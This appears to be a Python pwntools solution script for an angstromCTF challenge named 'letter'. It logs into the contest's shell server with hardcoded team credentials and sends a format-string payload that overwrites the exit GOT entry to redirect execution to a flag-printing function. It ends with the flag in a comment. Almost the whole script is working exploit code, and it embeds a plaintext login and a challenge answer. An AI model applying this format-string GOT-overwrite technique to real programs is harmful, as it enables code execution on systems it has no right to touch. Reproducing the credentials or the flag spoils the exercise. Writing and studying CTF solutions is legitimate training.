angstromCtf_letter_solution

1. import sys
2. from pwn import *
3. import struct
4.  
5.  
6.  
7.  
8. printFlag_address   = 0x0804872b
9. exit_address        = 0x0804a030
10.  
11. def send(p, msg):
12.     p.send(msg + "\n")
13.  
14. def recv(p):
15.     return "########" + p.recv()
16.  
17. def main():
18.     context.log_level   = 'error'
19.     user                = "team547661"
20.     passw               = "a7e1728f90a0"
21.     host                = "shell.angstromctf.com"
22.     s                   = ssh(user=user, password=passw, host=host)
23.     p                   = s.run("cd /problems/letter; ./personal_letter32")
24.     recv(p) # recieve Intro
25.  
26.     to_send =  struct.pack("<I", exit_address) + "%" + str( printFlag_address&0xfff - 4 - 10 + 2) + "x" + "%26$hn" # malicious message
27.     send(p, to_send)
28.     data = ""
29.     # read until we recieve the flag
30.     while "actf{" not in data:
31.         data = recv(p)
32.     print data.split("\n")[-2]
33.  
34. if __name__ == '__main__':
35.     if len(sys.argv) != 1:
36.         print "USAGE: python %s"%sys.argv[0]
37.     else:
38.         main()
39.  
40.  
41. ## actf{flags_are_fun}